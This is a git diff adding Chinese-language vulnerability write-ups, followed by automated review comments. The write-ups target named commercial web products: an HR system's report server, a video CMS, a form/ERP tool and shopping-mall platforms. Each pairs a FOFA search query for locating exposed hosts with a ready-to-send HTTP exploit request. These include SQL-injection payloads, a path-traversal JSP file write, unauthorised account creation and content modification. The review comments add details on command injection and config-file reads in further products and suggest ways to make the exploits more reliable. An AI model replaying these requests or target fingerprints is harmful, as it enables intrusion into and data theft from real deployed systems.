@@ -0,0 +1,21 @@ +# 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞 +高校人力资源管理系统ReportServer存在敏感信息泄露漏洞 + +## fofa +```javascript +body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729414884399-6be61b88-4e82-42e2-bfb0-451f6e130f92.png) + +## poc +```java +GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729415182606-37ca16b7-4b31-40ae-b37a-7350c1af4d59.png) + diff --git a/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md b/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md new file mode 100644 index 0000000..8fb67a3 --- /dev/null +++ b/魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md @@ -0,0 +1,31 @@ +# 魅思视频管理系统getOrderStatus存在SQL注入漏洞 + +# 一、漏洞简介 +魅思·视频 管理系统是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频!理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。魅思视频管理系统getOrderStatus存在SQL注入漏洞 + +# 二、影响版本 ++ 魅思视频管理系统 + +# 三、资产测绘 ++ fofa`app="魅思-视频管理系统"` ++ 特征 + +![1727023836767-354a75c7-a2c7-4473-b02d-e8a3390fcdf9.png](./img/oXIjlwtiyJrE2gt3/1727023836767-354a75c7-a2c7-4473-b02d-e8a3390fcdf9-203027.png) + +# 四、漏洞复现 +```go +POST /api/getOrderStatus HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(VERSION() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- - +``` + +![1727023853414-f66b3415-82fb-4dca-bfa6-1ae7f052f70a.png](./img/oXIjlwtiyJrE2gt3/1727023853414-f66b3415-82fb-4dca-bfa6-1ae7f052f70a-579791.png) + + + +> 更新: 2024-10-22 09:36:10 +> 原文: \ No newline at end of file 
diff --git a/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md b/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md new file mode 100644 index 0000000..f508750 --- /dev/null +++ b/魅思视频管理系统getOrderStatus存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 魅思视频管理系统getOrderStatus存在SQL注入漏洞 + +魅思视频管理系统getOrderStatus存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +app="魅思-视频管理系统" +``` + +## poc + +```javascript +POST /api/getOrderStatus HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 + +orderSn=%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28IFNULL%28CAST%28database%28%29+AS+NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+- +``` + +![image-20240917160329467](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171603549.png) \ No newline at end of file diff --git a/魔方网表mailupdate接口存在任意文件上传漏洞.md b/魔方网表mailupdate接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..554f4cf --- /dev/null +++ b/魔方网表mailupdate接口存在任意文件上传漏洞.md 
@@ -0,0 +1,43 @@ +# 魔方网表mailupdate接口存在任意文件上传漏洞 + +# 一、漏洞简介 +魔方网表是一款基于web浏览器的通用信息管理软件,魔方网表ERP 存在任意文件上传漏洞,未经身份验证的攻击者可以利用此漏洞上传恶意后门文件 ,控制服务器权限 + +# 二、影响版本 ++ 魔方网表 + +# 三、资产测绘 ++ fofa`icon_hash="694014318"` ++ 特征 + +![1713198631042-1ecb3376-f689-4f92-a0fc-8722c6de5d26.png](./img/fcGeBck8qqEaERf7/1713198631042-1ecb3376-f689-4f92-a0fc-8722c6de5d26-935968.png) + +# 四、漏洞复现 +```java +GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: +``` + +![1713198660976-8be544e1-30c0-4c5d-82c6-ce893cd8d981.png](./img/fcGeBck8qqEaERf7/1713198660976-8be544e1-30c0-4c5d-82c6-ce893cd8d981-189341.png) + +文件上传位置 + +```java +GET /magicflu/test1.jsp HTTP/1.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Host: +``` + +![1713198689517-129760d5-4911-439f-9c06-03e28e38c489.png](./img/fcGeBck8qqEaERf7/1713198689517-129760d5-4911-439f-9c06-03e28e38c489-361593.png) + + + +> 更新: 2024-04-17 14:59:07 +> 原文: \ No newline at end of file diff --git a/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md b/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md new file mode 100644 index 0000000..54ba587 --- /dev/null +++ b/鸿宇多用户商城scan_list.php存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 鸿宇多用户商城scan_list.php存在SQL注入漏洞 + +鸿宇多用户商城 scan_list.php 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## Fofa + +```javascript +body="HongYuJD" && body="68ecshopcom_360buy" +``` + +## poc + +```javascript +POST /scan_list.php HTTP/1.1 +Host: your-ip +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +data['fahuo']=(SELECT 2753 FROM (SELECT(SLEEP(4)))QkUH)&act=view +``` + +![image-20241025141431703](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251414765.png) \ No newline at end of file diff --git a/龙采商城系统后台_goods_getcate存在SQL注入.md b/龙采商城系统后台_goods_getcate存在SQL注入.md new file mode 100644 index 0000000..26554fe --- /dev/null +++ b/龙采商城系统后台_goods_getcate存在SQL注入.md 
@@ -0,0 +1,36 @@ +# 龙采商城系统后台/goods/getcate存在SQL注入 + +### 一、漏洞描述 +龙采科技集团有限责任公司龙采商城系统后台/goods/getCate接口存在未授权SQL注入,可直接暴露出数据库敏感信息。 + +### 二、影响版本 +龙采商城系统 + +### 三、资产测绘 +FOFA:body="'url':'/pc2.0/index/index'" + +![1715916044415-70ff5169-8fd9-48e0-8c05-91ac458ccde4.png](./img/GOhx3tRoZc_7z5pI/1715916044415-70ff5169-8fd9-48e0-8c05-91ac458ccde4-841370.png) + +### 四、漏洞复现 +```plain +POST /goods/getCate HTTP/2 +Host: xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 65 + +id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)&keyword= +``` + +使用burp请求POC即可暴出敏感数据库(也可以采用sqlmap跑出大量敏感信息) + +![1715916319450-8e51a0ec-7878-4d2d-a04f-c7cc9af69340.png](./img/GOhx3tRoZc_7z5pI/1715916319450-8e51a0ec-7878-4d2d-a04f-c7cc9af69340-172677.png) + + + +> 更新: 2024-06-01 11:14:23 +> 原文: \ No newline at end of file diff --git a/龙采商城系统存在未授权修改文章title.md b/龙采商城系统存在未授权修改文章title.md new file mode 100644 index 0000000..635d776 --- /dev/null +++ b/龙采商城系统存在未授权修改文章title.md 
@@ -0,0 +1,40 @@ +# 龙采商城系统存在未授权修改文章title + +### 一、漏洞描述 +龙采科技集团有限责任公司龙采商城系统后台未授权修改文章title,可直接无需登录后台后即可修改文章title。 + +### 二、影响版本 +龙采商城系统 + +### 三、资产测绘 +FOFA:body="'url':'/pc2.0/index/index'" + +### 四、漏洞复现 +来到帮助中心,随机找一个分类标题,F12查看其article_id记录下来,替换掉POC里的id值,请求POC,更改data内容(建议以原来title内容+1作为区分,攻击后记得改回来),刷新页面发现标题已经被更改!![1715916930434-01af42c1-1705-4129-bce4-57431e8393ec.png](./img/pw7d7qCzBp2HBEtJ/1715916930434-01af42c1-1705-4129-bce4-57431e8393ec-209105.png) + +```plain +POST /article/text_update HTTP/2 +Host: xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 39 + +id=77¶meter=title&data=常见问题1 +``` + +![1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217.png](./img/pw7d7qCzBp2HBEtJ/1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217-081146.png) + +刷新以后发现已将"购物流程"修改为"常见问题1" + +![1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d.png](./img/pw7d7qCzBp2HBEtJ/1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d-426834.png) + + + + + +> 更新: 2024-06-01 11:14:22 +> 原文: \ No newline at end of file diff --git a/龙采商城系统存在未授权添加会员登录.md b/龙采商城系统存在未授权添加会员登录.md new file mode 100644 index 0000000..edbbde0 --- /dev/null +++ b/龙采商城系统存在未授权添加会员登录.md 
@@ -0,0 +1,38 @@ +# 龙采商城系统存在未授权添加会员登录 + +### 一、漏洞描述 +龙采科技集团有限责任公司龙采商城系统存在未授权漏洞可在未登录后台的情况下请求POC添加会员并登录。 + +### 二、影响版本 +龙采商城系统 + +### 三、资产测绘 +FOFA:body="'url':'/pc2.0/index/index'" + +### 四、漏洞复现 +攻击前无法登录会员(15712341234/123456ys),请求POC攻击后即可正常登录会员。 + +![1715915610877-c3de95a7-b27b-48db-abeb-35981520445c.jpeg](./img/ye2mTZUMWNMKHS1X/1715915610877-c3de95a7-b27b-48db-abeb-35981520445c-974942.jpeg)构造POC进行发送 + +```plain +POST /member/create HTTP/2 +Host: xxxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 116 + +phone=15712341234&password=123456ys&confirm_password=123456ys&add_money=&add_integral=&sex=1&status=1&usable_money=0 +``` + +![1715915618660-8321c8a1-17ab-4bd2-b842-18e3f63fd5bf.jpeg](./img/ye2mTZUMWNMKHS1X/1715915618660-8321c8a1-17ab-4bd2-b842-18e3f63fd5bf-342096.jpeg) + +成功登录![1715915626466-79d25afd-a7ea-4f99-97f7-ee600b1468c6.jpeg](./img/ye2mTZUMWNMKHS1X/1715915626466-79d25afd-a7ea-4f99-97f7-ee600b1468c6-903320.jpeg)![1715915629687-e26c8582-fde8-470b-a967-edc217770e10.jpeg](./img/ye2mTZUMWNMKHS1X/1715915629687-e26c8582-fde8-470b-a967-edc217770e10-933378.jpeg) + + + +> 更新: 2024-06-01 11:14:23 +> 原文: \ No newline at end of file diff --git a/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md b/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md new file mode 100644 index 0000000..b3954fc --- /dev/null +++ b/龙采商城系统新人礼包权限开关处存在未授权SQL注入.md 
@@ -0,0 +1,41 @@ +# 龙采商城系统新人礼包权限开关处存在未授权SQL注入 + +### 一、漏洞描述 +龙采科技集团有限责任公司龙采商城系统新人礼包权限开关处存在未授权SQL注入,可直接无需登录后台即可暴露出数据库敏感信息。 + +### 二、影响版本 +龙采商城系统 + +### 三、资产测绘 +FOFA:body="'url':'/pc2.0/index/index'" + +界面框架大致如下: + +![1715913715272-6b2b1541-925a-4122-a1c1-739f56e008d1.png](./img/-LguuObqFJEiyiS4/1715913715272-6b2b1541-925a-4122-a1c1-739f56e008d1-967924.png) + +### 四、漏洞复现 +```plain +POST /coupon/auditing HTTP/1.1 +Host: xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 60 +Connection: close + +id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1) + + +``` + +使用burp请求POC即可暴出敏感数据库(也可以采用sqlmap跑出大量敏感信息) + +![1715913259926-c5a808ea-5281-4129-abb9-f358ef824dab.png](./img/-LguuObqFJEiyiS4/1715913259926-c5a808ea-5281-4129-abb9-f358ef824dab-585388.png) + + + +> 更新: 2024-06-01 11:14:23 +> 原文: \ No newline at end of file
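Review bot: the UploadInvtSpFile write-up in 顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md stops at the upload request and never says where the uploaded `2142142142.asp` lands or how to confirm it executes, so a reader cannot tell a rejected upload from a successful one; add the response body or the URL that serves the file, as the 魔方网表 entry in this same patch does with its "文件上传位置" step. Also say that `Content-Length: 178` must be recomputed if the filename or the `<% response.write("1111")%>` marker is changed, and prefer a unique filename so repeated tests on one host do not overwrite each other.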
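Review bot: in both 顺景ERP系统FullGuidFileName任意文件读取漏洞.md and 顺景ERP系统GetFile任意文件读取漏洞.md the summary sentence repeats "数据库配置文件" twice ("读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等"), and the fofa block lists `body="/api/DBRecord/getDBRecords"` and `body="顺景软件 WebAPI 服务端"` on two lines with no `&&` or `||` between them, so it is unclear whether the fingerprint is the conjunction or either line alone; write the operator explicitly. The two PoCs differ only in the endpoint and parameter (`/api/TMScmQuote/GetFile?FullGuidFileName=/../web.config` versus `/api/Download/GetFile?FileName=/../web.config`); cross-reference them so that a fix or a detection rule for one is checked against the other, and state what a positive response contains (the `web.config` connection strings) rather than only attaching a screenshot.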
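Review bot: 飞企互联-FE-业务协作平台存在参数文件读取漏洞-.md gives only the path `/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print` with no method, no headers, no description and no indication of what a positive response looks like; say that the target file is the application's JDBC configuration and that the response should contain the database URL and credentials, and give the title a real description instead of "参数文件读取". The title line uses `##` where every other file in the patch uses `#`, and the filename carries a stray `-` before `.md`.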
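Review bot: the heading "# ke一、漏洞简介" in 飞讯云供应链平台MyImportData前台SQL注入.md has a stray "ke" prefix, the title names the product 飞讯云供应链平台 while the body calls it 飞讯云WMS, and the fofa line concatenates two backtick spans (`icon_hash="-2088130336"``body="wx8ccb75857bd3e985"`) with no operator between them. The PoC request carries a captured session (`Cookie: JSESSIONID=83a23f73-2908-4424-abd9-6b044cdfe003; Language=zh-CN`) plus Sec-Fetch and Priority headers that play no part in the injection; strip the cookie before publishing and trim the headers to what is needed. Finally, the summary asserts "造成远程代码执行", but the PoC only demonstrates a time-based blind injection (`opeid=' WAITFOR DELAY '0:0:5'--`); claim RCE only if stacked queries or xp_cmdshell were actually confirmed, otherwise describe the impact as information disclosure.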
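Review bot: the PoC `GET /js/../.htpasswd HTTP/1.1` in 飞鱼星-路由器存在敏感信息泄露漏洞.md only works if the literal `/js/../` segment reaches the server, and most HTTP clients collapse it to `/.htpasswd` before sending (curl needs `--path-as-is`, browsers normalise the path), so the write-up should say the request must be sent raw, for example from Burp Repeater. The vulnerability paragraph currently just repeats the title after the company blurb; state what the leaked file contains (an `.htpasswd` is a list of `user:passwordhash` lines) so the reader knows what a positive result is and why it matters.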
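Review bot: the PoC in 飞鱼星下一代防火墙安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md writes the `whoami` output to `/usr/local/webui/sslvpn/stc.txt` via `tee`, which leaves a world-readable file with command output under the appliance's web root (it is fetched in the second request as `/sslvpn/stc.txt`); say that this artifact persists, give the removal step, and prefer a unique filename so several testers do not overwrite each other's results. The `suffix=` value also mixes percent-encoded (`%20`, `%60`) and raw (`;`, `|`) characters; encode it consistently so it survives being pasted into tools other than Burp.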
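Review bot: in 飞鱼星家用智能路由存在敏感信息泄露漏洞.md the "特征" screenshot `1710903993282-74c0565e-7ea8-4511-909f-4be0e632c2a7.png` is the same image used as the fingerprint in the three 飞鱼星智能上网行为管理系统 entries (whose fofa query is `title="飞鱼星企业级智能上网行为管理系统"`), so it does not illustrate the `title="飞鱼星家用智能路由"` product; replace it with the home router's page. Both 家用智能路由 files also restate their title as the whole vulnerability description; state which fields `request_para.cgi?parameter=wifi_info` returns, and note that the same endpoint (plus `wifi_get_5g_host` and `wifi_get_2g_host`) is documented for the 智能上网行为管理系统, so the two products evidently share the CGI and the entries should reference each other.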
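Review bot: the bypass step "看见/cookie.cgi时,丢弃即可进入后台" in 飞鱼星家用智能路由存在权限绕过漏洞.md and 飞鱼星智能上网行为管理系统存在权限绕过漏洞.md should say where the request is dropped (in the intercepting proxy, when the page loaded from `/index.html` or `/home/index.html` calls `/cookie.cgi`) and what that implies: the login check is enforced by that client-side call and the backend pages are served without any session. As written the reader has to reconstruct the procedure from the screenshots.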
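Review bot: the send_order PoC in 飞鱼星智能上网行为管理系统send_order存在远程命令执行漏洞.md declares `Content-Type: application/x-www-form-urlencoded` while the body is JSON (`{"opid":"777777777777777777","name":";id;echo;","type":"rest"}`); if the request works as shown, the CGI reads the raw body regardless of the declared type, and the write-up should say so, otherwise someone "correcting" the header to `application/json` or feeding the request to a form-aware tool will get a rewritten body. `Content-Length: 62` does match the body. Also say where in the response the output of `id` appears, since the injected `;id;echo;` is the only evidence of execution.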
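Review bot: 驰骋BPMRunSQL_Init存在SQL注入漏洞.md labels this SQL injection, but the PoC posts a complete statement (`SELECT No,Pass FROM Port_Emp`) in a form field named `SQL` to a handler called `RunSQL_Init`; that is an unauthenticated arbitrary-SQL-execution endpoint rather than an injection into an existing query, which matters for detection (alert on any unauthenticated POST to `Handler.ashx?DoType=RunSQL_Init`, not on injection patterns in a parameter) and for the fix (the handler needs authentication or removal, parameterisation does not apply). The request also carries `Accept-Ldwk: bG91ZG9uZ3dlbmt1`, a base64 watermark header from the original publisher that has no role in the exploit; drop it.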
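Review bot: the endpoint in 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞.md, `/ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo`, is the datasource-info command of the embedded FineReport reporting server (the `ReportServer` path and `Fr_` operation prefix are FineReport's), not code belonging to the HR system itself; say so, because the same request applies to any site bundling that report server and the fix lands in the FineReport component, not in the HR application. The description line just repeats the title; state that the response lists the configured datasource connection strings, which is what the screenshot is meant to show.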
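Review bot: 魅思视频管理系统getOrderStatus存在SQL注入漏洞 2.md and 魅思视频管理系统getOrderStatus存在SQL注入漏洞.md document the same `POST /api/getOrderStatus` UNION injection on `orderSn` (one extracts `VERSION()`, the other `database()`); the " 2" suffix looks like a sync-conflict copy, so merge them into one file. In the " 2" copy the description contains a garbled character, "强大的视频!理功能" for "视频管理功能", and the request fence is tagged ```go although the content is a raw HTTP request; the other files use ```plain or ```javascript for the same thing, so pick one tag for the whole repository.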
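Review bot: the mailupdate PoC in 魔方网表mailupdate接口存在任意文件上传漏洞.md writes `test1.jsp` into the application root through `messageid=/../../../test1.jsp` and then confirms it at `/magicflu/test1.jsp`; as with any file-write PoC, say that the file persists and must be removed, and prefer a random filename, because a fixed `test1.jsp` printing `tteesstt1` both collides between testers and is a trivially fingerprintable artifact for anyone scanning the host afterwards. The summary also calls the product "魔方网表ERP" in one sentence and "魔方网表" elsewhere; use one name.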
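Review bot: in 鸿宇多用户商城scan_list.php存在SQL注入漏洞.md the form key is written as `data['fahuo']` with raw quotes and brackets and the payload `(SELECT 2753 FROM (SELECT(SLEEP(4)))QkUH)` contains unencoded spaces and parentheses; that is tolerated by Burp but anyone pasting it into curl or a scanner should URL-encode it, and the page should state the expected outcome (a response delayed by roughly four seconds), since nothing else distinguishes a hit from a miss. `Host: your-ip` is a placeholder where the other files in this patch leave `Host:` blank; be consistent.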
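Review bot: 龙采商城系统后台_goods_getcate存在SQL注入.md and 龙采商城系统存在未授权修改文章title.md give the request line as `POST /goods/getCate HTTP/2` and `POST /article/text_update HTTP/2`; that is Burp's rendering of an HTTP/2 capture, but HTTP/2 is a binary framing and the text cannot be replayed by curl, nc or most scanners, so write `HTTP/1.1` as the 新人礼包 entry already does. The getCate file's title uses `/goods/getcate` while the request uses `/goods/getCate`; routes are often case-sensitive, keep the cased form. The `id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)` payload used in both getCate and `/coupon/auditing` is error-based, so say that the database name is returned inside the XPATH syntax error message; and since all three 龙采 SQL/unauthorised entries share `body="'url':'/pc2.0/index/index'"`, cross-reference them.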
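Review bot: the body `id=77¶meter=title&data=常见问题1` in 龙采商城系统存在未授权修改文章title.md is corrupted: `&para` at the start of `&parameter=` was decoded as the HTML entity for the pilcrow `¶`, so as published the request sends `id=77¶meter=title` and the `parameter=title` field never reaches the server; restore `&parameter=title` and recompute `Content-Length`. Because this PoC alters production content, turn "记得改回来" into an explicit restore step with the reverting request, and say which element to inspect with F12 to read the `article_id`.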
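Review bot: the `POST /member/create` PoC in 龙采商城系统存在未授权添加会员登录.md creates a persistent account (`phone=15712341234&password=123456ys`) on the target and the write-up never mentions removing it; add the cleanup step or at least say the account persists, and use an obviously test-only number rather than one that could belong to a real subscriber. The fields `add_money=`, `add_integral=` and `usable_money=0` indicate this is the back-office member-creation form; whether a non-zero balance can be set without authentication is worth testing and stating either way, since that would be a separate and more severe finding.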